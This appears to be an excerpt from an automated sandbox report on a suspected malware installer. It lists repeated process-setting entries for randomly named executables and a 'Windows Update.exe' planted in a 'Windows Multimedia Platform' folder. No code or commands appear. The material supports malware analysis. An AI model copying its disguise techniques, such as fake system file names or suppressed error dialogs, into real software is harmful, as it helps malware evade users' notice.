Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
